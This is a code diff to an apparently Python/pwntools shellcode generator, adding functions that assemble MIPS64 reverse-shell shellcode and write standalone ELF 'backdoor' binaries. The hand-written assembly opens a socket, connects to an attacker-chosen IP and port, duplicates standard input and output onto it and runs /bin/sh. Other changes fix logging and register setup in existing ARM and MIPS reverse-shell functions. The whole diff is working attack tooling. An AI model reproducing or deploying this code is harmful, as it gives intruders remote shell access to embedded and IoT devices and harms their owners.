@@ -140,7 +140,7 @@ def aarch64_reverse_sl(reverse_ip,reverse_port):
 	shellcode_len=len(shellcode)
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
-		log.info("the null byte in %d"%shellcode.index("\x00"))
+		log.info("the null byte in %d"%int(shellcode.index("\x00")))
 		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
@@ -284,7 +284,7 @@ def armelv7_reverse_sl(reverse_ip,reverse_port):
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		#print shellcode.index("\x00")
-		log.info("the null byte in %d"%(shellcode.index("\x00")))
+		log.info("the null byte in %d"%(int(shellcode.index("\x00"))))
 		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
@@ -414,7 +414,7 @@ def armelv5_reverse_sl(reverse_ip,reverse_port):
 	shellcode_len=len(shellcode)
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
-		log.info("the null byte in %d"%(shellcode.index("\x00")))
+		log.info("the null byte in %d"%(int(shellcode.index("\x00"))))
 		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
@@ -523,7 +523,7 @@ def armebv7_reverse_sl(reverse_ip,reverse_port):
 	shellcode_len=len(shellcode)
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
-		log.success("the null byte in %d"%shellcode.index("\x00"))
+		log.success("the null byte in %d"%int(shellcode.index("\x00")))
 		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
@@ -632,7 +632,7 @@ def armebv5_reverse_sl(reverse_ip,reverse_port):
 	shellcode_len=len(shellcode)
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
-		log.info("the null byte in %d"%shellcode.index("\x00"))
+		log.info("the null byte in %d"%int(shellcode.index("\x00")))
 		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
@@ -787,7 +787,8 @@ def mipsel_reverse_sl(reverse_ip,reverse_port):
 	context.bits="32"
 	shellcode_connect=asm(shellcraft.connect(reverse_ip,reverse_port))
 	shellcode_dump_sh='''
-	sub $a1,$a0,9
+	xor $t2,$t2
+	move $a1,$t2
 	li  $v0,0xfdf
 	syscall 0x40404
 	li  $t9,-2
@@ -807,7 +808,7 @@ def mipsel_reverse_sl(reverse_ip,reverse_port):
 	shellcode_hex=extract_shellcode.extract_sl_print(data_shellcode,shellcode_hex)
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
-		log.info("the null byte in %d"%(shellcode.index(shellcode)))
+		log.info("the null byte in %d"%(int(data_shellcode.index(b"\x00"))))
 		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
@@ -827,7 +828,8 @@ def mips_reverse_sl(reverse_ip,reverse_port):
 	context.endian='big'
 	shellcode_connect=asm(shellcraft.connect(reverse_ip,reverse_port))
 	shellcode_dump_sh='''
-	sub $a1,$a0,9
+	xor $t2,$t2
+	move $a1,$t2
 	li  $v0,0xfdf
 	syscall 0x40404
 	li  $t9,-2
@@ -847,7 +849,7 @@ def mips_reverse_sl(reverse_ip,reverse_port):
 	shellcode_hex=extract_shellcode.extract_sl_print(data_shellcode,shellcode_hex)
 	if "\\x00" in shellcode_hex:
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
-		log.info("the null byte in %d"%(shellcode.index(shellcode)))
+		log.info("the null byte in %d"%(int(data_shellcode.index(b"\x00"))))
 		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
@@ -861,3 +863,428 @@ def mips_reverse_sl(reverse_ip,reverse_port):
 		context.endian="little"
 		return data_shellcode
 
+def mips64el_backdoor(reverse_ip,reverse_port,filename=None):
+	'''
+	socket number v0=0x13b0
+	connect number v0=0x13b1
+	dup2  number v0=0x13A8
+	execve number v0=0x13c1
+	:param reverse_ip:
+	:param reverse_port:
+	:param filename:
+	:return:
+	'''
+	reverse_port=int(hex(reverse_port),16)
+	reverse_port=hex(0x10000-int("0x"+enhex(p16(reverse_port)),16)-1)
+	reverse_ip=list(reverse_ip.split("."))
+	reverse_ip_high=hex(0x10000-((int(reverse_ip[1])<<8)+int(reverse_ip[0]))-1)
+	#print(reverse_ip_high)
+	#print((int(reverse_ip[1])<<8)+int(reverse_ip[0]))
+	#print(reverse_ip_high)
+	reverse_ip_low=hex(0x10000-((int(reverse_ip[3])<<8)+int(reverse_ip[2]))-1)
+	#print(reverse_ip_low)
+	context.arch='mips64'
+	context.bits="64"
+	context.endian='little'
+	shellcode_connect='''
+	li      $t9, -3
+	nor     $a0, $t9, $zero
+	li      $t9, -3
+	nor     $a1, $t9, $zero
+	slti    $a2, $zero, -1
+	li      $v0, 0x13b0
+	syscall 0x40404
+	sw      $v0, -4($sp)
+	lw      $s0, -4($sp)
+	lui     $t9, %s
+	ori     $t9, $t9, 0xfffd
+	nor     $t1, $t9, $zero
+	sw      $t1, -8($sp)
+	lui     $t9, %s
+	ori     $t9, $t9, %s
+	nor     $t1, $t9, $zero
+	sw      $t1, -4($sp)
+	daddiu  $sp, $sp, -8
+	sw      $s0, -4($sp)
+	lw      $a0, -4($sp)
+	move     $a1,$sp
+	li      $t9, -17
+	nor     $a2, $t9, $zero
+	li      $v0, 0x13b1
+	syscall 0x40404
+	'''
+	shellcode_connect=shellcode_connect%(reverse_port,reverse_ip_low,reverse_ip_high)
+	shellcode_dup_sh='''
+	move $a0,$s0
+	nor $a1,$zero,-1
+	li  $v0,0x13A8
+	syscall 0x40404
+	move $a0,$s0
+	li  $t9,-2
+	nor $a1,$t9,$zero
+	li  $v0,0x13A8
+	syscall 0x40404
+	move $a0,$s0
+	li  $t9,-3
+	nor $a1,$t9,$zero
+	li  $v0,0x13A8
+	syscall 0x40404
+	'''
+	shellcode_execve='''
+	lui     $t1, 0x6e69
+	ori     $t1, $t1, 0x622f
+	sw      $t1, -8($sp)
+	lui     $t9, 0xff97
+	ori     $t9, $t9, 0x8cd0
+	nor     $t1, $t9, $zero
+	sw      $t1, -4($sp)
+	daddiu   $sp, $sp, -8
+	dadd     $a0, $sp, $zero
+	lui     $t1, 0x6e69
+	ori     $t1, $t1, 0x622f
+	sw      $t1,-12($sp)
+	lui     $t9, 0xff97
+	ori     $t9, $t9, 0x8cd0
+	nor     $t1, $t9, $zero
+	sw      $t1, -8($sp)
+	sw      $zero, -4($sp)
+	daddiu   $sp, $sp, -12
+	slti    $a1, $zero, -1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	li      $t9, -9
+	nor     $a1, $t9, $zero
+	dadd     $a1, $sp, $a1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	dadd     $a1, $sp, $zero
+	slti    $a2, $zero, -1
+	li      $v0, 0x13c1
+	syscall 0x40404
+
+	'''
+	shellcode=asm(shellcode_connect)+asm(shellcode_dup_sh)+asm(shellcode_execve)
+	shellcode=make_elf(shellcode)
+	if(filename==None):
+		f=open("./mips64el_backdoor","wb")
+		f.write(shellcode)
+		f.close()
+		print("mips64el_backdoor is ok in current path ./")
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+
+
+def mips64_backdoor(reverse_ip,reverse_port,filename=None):
+	context.arch='mips64'
+	context.bits="64"
+	context.endian='big'
+	reverse_port = int(hex(reverse_port), 16)
+	reverse_port = hex(0x10000 - int("0x" + enhex(p16(reverse_port)), 16) - 1)
+	reverse_ip = list(reverse_ip.split("."))
+	reverse_ip_high = hex(0x10000 - ((int(reverse_ip[0]) << 8) + int(reverse_ip[1])) - 1)
+	# print(reverse_ip_high)
+	# print((int(reverse_ip[1])<<8)+int(reverse_ip[0]))
+	# print(reverse_ip_high)
+	reverse_ip_low = hex(0x10000 - ((int(reverse_ip[2]) << 8) + int(reverse_ip[3])) - 1)
+	shellcode_connect = '''
+	li      $t9, -3
+	nor     $a0, $t9, $zero
+	li      $t9, -3
+	nor     $a1, $t9, $zero
+	slti    $a2, $zero, -1
+	li      $v0, 0x13b0
+	syscall 0x40404
+	sw      $v0, -4($sp)
+	lw      $s0, -4($sp)
+	lui     $t9, 0xfffd
+	ori     $t9, $t9, %s
+	nor     $t1, $t9, $zero
+	sw      $t1, -8($sp)
+	lui     $t9, %s
+	ori     $t9, $t9, %s
+	nor     $t1, $t9, $zero
+	sw      $t1, -4($sp)
+	daddiu  $sp, $sp, -8
+	sw      $s0, -4($sp)
+	lw      $a0, -4($sp)
+	move     $a1,$sp
+	li      $t9, -17
+	nor     $a2, $t9, $zero
+	li      $v0, 0x13b1
+	syscall 0x40404
+	'''
+	shellcode_connect=shellcode_connect%(reverse_port,reverse_ip_high,reverse_ip_low)
+	shellcode_dup_sh='''
+	move $a0,$s0
+	nor $a1,$zero,-1
+	li  $v0,0x13A8
+	syscall 0x40404
+	move $a0,$s0
+	li  $t9,-2
+	nor $a1,$t9,$zero
+	li  $v0,0x13A8
+	syscall 0x40404
+	move $a0,$s0
+	li  $t9,-3
+	nor $a1,$t9,$zero
+	li  $v0,0x13A8
+	syscall 0x40404
+	'''
+	shellcode_execve='''
+	lui     $t1, 0x2f62
+	ori     $t1, $t1, 0x696e
+	sw      $t1, -8($sp)
+	lui     $t9, 0xd08c
+	ori     $t9, $t9, 0x97ff
+	nor     $t1, $t9, $zero
+	sw      $t1, -4($sp)
+	daddiu   $sp, $sp, -8
+	dadd     $a0, $sp, $zero
+	lui     $t1, 0x2f62
+	ori     $t1, $t1, 0x696e
+	sw      $t1, -12($sp)
+	lui     $t9, 0xd08c
+	ori     $t9, $t9, 0x97ff
+	nor     $t1, $t9, $zero
+	sw      $t1, -8($sp)
+	sw      $zero, -4($sp)
+	daddiu   $sp, $sp, -12
+	slti    $a1, $zero, -1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	li      $t9, -9
+	nor     $a1, $t9, $zero
+	dadd     $a1, $sp, $a1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	dadd     $a1, $sp, $zero
+	slti    $a2, $zero, -1
+	li      $v0,0x13c1
+	syscall 0x40404
+	'''
+	shellcode = asm(shellcode_connect) + asm(shellcode_dup_sh) + asm(shellcode_execve)
+	shellcode = make_elf(shellcode)
+	if (filename == None):
+		f = open("./mips64_backdoor", "wb")
+		f.write(shellcode)
+		f.close()
+		print("mips64_backdoor is ok in current path ./")
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+
+def mips64el_reverse_sl(reverse_ip,reverse_port):
+	reverse_port=int(hex(reverse_port),16)
+	reverse_port=hex(0x10000-int("0x"+enhex(p16(reverse_port)),16)-1)
+	reverse_ip=list(reverse_ip.split("."))
+	reverse_ip_high=hex(0x10000-((int(reverse_ip[1])<<8)+int(reverse_ip[0]))-1)
+	#print(reverse_ip_high)
+	#print((int(reverse_ip[1])<<8)+int(reverse_ip[0]))
+	#print(reverse_ip_high)
+	reverse_ip_low=hex(0x10000-((int(reverse_ip[3])<<8)+int(reverse_ip[2]))-1)
+	#print(reverse_ip_low)
+	context.arch='mips64'
+	context.bits="64"
+	context.endian='little'
+	shellcode_connect='''
+	li      $t9, -3
+	nor     $a0, $t9, $zero
+	li      $t9, -3
+	nor     $a1, $t9, $zero
+	slti    $a2, $zero, -1
+	li      $v0, 0x13b0
+	syscall 0x40404
+	sw      $v0, -4($sp)
+	lw      $s0, -4($sp)
+	lui     $t9, %s
+	ori     $t9, $t9, 0xfffd
+	nor     $t1, $t9, $zero
+	sw      $t1, -8($sp)
+	lui     $t9, %s
+	ori     $t9, $t9, %s
+	nor     $t1, $t9, $zero
+	sw      $t1, -4($sp)
+	daddiu  $sp, $sp, -8
+	sw      $s0, -4($sp)
+	lw      $a0, -4($sp)
+	move     $a1,$sp
+	li      $t9, -17
+	nor     $a2, $t9, $zero
+	li      $v0, 0x13b1
+	syscall 0x40404
+	'''
+	shellcode_connect=shellcode_connect%(reverse_port,reverse_ip_low,reverse_ip_high)
+	shellcode_dup_sh='''
+	xor $t2,$t2
+	move $a1,$t2
+	li  $v0,0x13A8
+	syscall 0x40404
+	li  $t9,-2
+	nor $a1,$t9,$zero
+	li  $v0,0x13A8
+	syscall 0x40404
+	li  $t9,-3
+	nor $a1,$t9,$zero
+	li  $v0,0x13A8
+	syscall 0x40404
+	'''
+	shellcode_execve='''
+	lui     $t1, 0x6e69
+	ori     $t1, $t1, 0x622f
+	sw      $t1, -8($sp)
+	lui     $t9, 0xff97
+	ori     $t9, $t9, 0x8cd0
+	nor     $t1, $t9, $zero
+	sw      $t1, -4($sp)
+	daddiu   $sp, $sp, -8
+	dadd     $a0, $sp, $zero
+	lui     $t1, 0x6e69
+	ori     $t1, $t1, 0x622f
+	sw      $t1,-12($sp)
+	lui     $t9, 0xff97
+	ori     $t9, $t9, 0x8cd0
+	nor     $t1, $t9, $zero
+	sw      $t1, -8($sp)
+	sw      $zero, -4($sp)
+	daddiu   $sp, $sp, -12
+	slti    $a1, $zero, -1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	li      $t9, -9
+	nor     $a1, $t9, $zero
+	dadd     $a1, $sp, $a1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	dadd     $a1, $sp, $zero
+	slti    $a2, $zero, -1
+	li      $v0, 0x13c1
+	syscall 0x40404
+	'''
+	data_shellcode=asm(shellcode_connect)+asm(shellcode_dup_sh)+asm(shellcode_execve)
+	shellcode_len = len(data_shellcode)
+	shellcode_hex = ''
+	shellcode_hex = extract_shellcode.extract_sl_print(data_shellcode, shellcode_hex)
+	if "\\x00" in shellcode_hex:
+		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
+		log.info("the null byte in {}".format(data_shellcode.index(b"\x00")))
+		print(shellcode_hex)
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+		return data_shellcode
+	else:
+		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
+		print(shellcode_hex)
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+		return data_shellcode
+
+def mips64_reverse_sl(reverse_ip,reverse_port):
+	context.arch = 'mips64'
+	context.bits = "64"
+	context.endian = 'big'
+	reverse_port = int(hex(reverse_port), 16)
+	reverse_port = hex(0x10000 - int("0x" + enhex(p16(reverse_port)), 16) - 1)
+	reverse_ip = list(reverse_ip.split("."))
+	reverse_ip_high = hex(0x10000 - ((int(reverse_ip[0]) << 8) + int(reverse_ip[1])) - 1)
+	# print(reverse_ip_high)
+	# print((int(reverse_ip[1])<<8)+int(reverse_ip[0]))
+	# print(reverse_ip_high)
+	reverse_ip_low = hex(0x10000 - ((int(reverse_ip[2]) << 8) + int(reverse_ip[3])) - 1)
+	shellcode_connect = '''
+		li      $t9, -3
+		nor     $a0, $t9, $zero
+		li      $t9, -3
+		nor     $a1, $t9, $zero
+		slti    $a2, $zero, -1
+		li      $v0, 0x13b0
+		syscall 0x40404
+		sw      $v0, -4($sp)
+		lw      $s0, -4($sp)
+		lui     $t9, 0xfffd
+		ori     $t9, $t9, %s
+		nor     $t1, $t9, $zero
+		sw      $t1, -8($sp)
+		lui     $t9, %s
+		ori     $t9, $t9, %s
+		nor     $t1, $t9, $zero
+		sw      $t1, -4($sp)
+		daddiu  $sp, $sp, -8
+		sw      $s0, -4($sp)
+		lw      $a0, -4($sp)
+		move     $a1,$sp
+		li      $t9, -17
+		nor     $a2, $t9, $zero
+		li      $v0, 0x13b1
+		syscall 0x40404
+		'''
+	shellcode_connect = shellcode_connect % (reverse_port, reverse_ip_high, reverse_ip_low)
+	shellcode_dup_sh='''
+	xor $t2,$t2
+	move $a1,$t2
+	li  $v0,0x13A8
+	syscall 0x40404
+	li  $t9,-2
+	nor $a1,$t9,$zero
+	li  $v0,0x13A8
+	syscall 0x40404
+	li  $t9,-3
+	nor $a1,$t9,$zero
+	li  $v0,0x13A8
+	syscall 0x40404
+	'''
+	shellcode_execve='''
+	lui     $t1, 0x2f62
+	ori     $t1, $t1, 0x696e
+	sw      $t1, -8($sp)
+	lui     $t9, 0xd08c
+	ori     $t9, $t9, 0x97ff
+	nor     $t1, $t9, $zero
+	sw      $t1, -4($sp)
+	daddiu   $sp, $sp, -8
+	dadd     $a0, $sp, $zero
+	lui     $t1, 0x2f62
+	ori     $t1, $t1, 0x696e
+	sw      $t1, -12($sp)
+	lui     $t9, 0xd08c
+	ori     $t9, $t9, 0x97ff
+	nor     $t1, $t9, $zero
+	sw      $t1, -8($sp)
+	sw      $zero, -4($sp)
+	daddiu   $sp, $sp, -12
+	slti    $a1, $zero, -1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	li      $t9, -9
+	nor     $a1, $t9, $zero
+	dadd     $a1, $sp, $a1
+	sd      $a1, -8($sp)
+	daddi    $sp, $sp, -8
+	dadd     $a1, $sp, $zero
+	slti    $a2, $zero, -1
+	li      $v0,0x13c1
+	syscall 0x40404
+	'''
+	data_shellcode=asm(shellcode_connect)+asm(shellcode_dup_sh)+asm(shellcode_execve)
+	shellcode_len = len(data_shellcode)
+	shellcode_hex = ''
+	shellcode_hex = extract_shellcode.extract_sl_print(data_shellcode, shellcode_hex)
+	if "\\x00" in shellcode_hex:
+		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
+		log.info("the null byte in {}".format(data_shellcode.index(b"\x00")))
+		print(shellcode_hex)
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+		return data_shellcode
+	else:
+		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
+		print(shellcode_hex)
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+		return data_shellcode
+
+
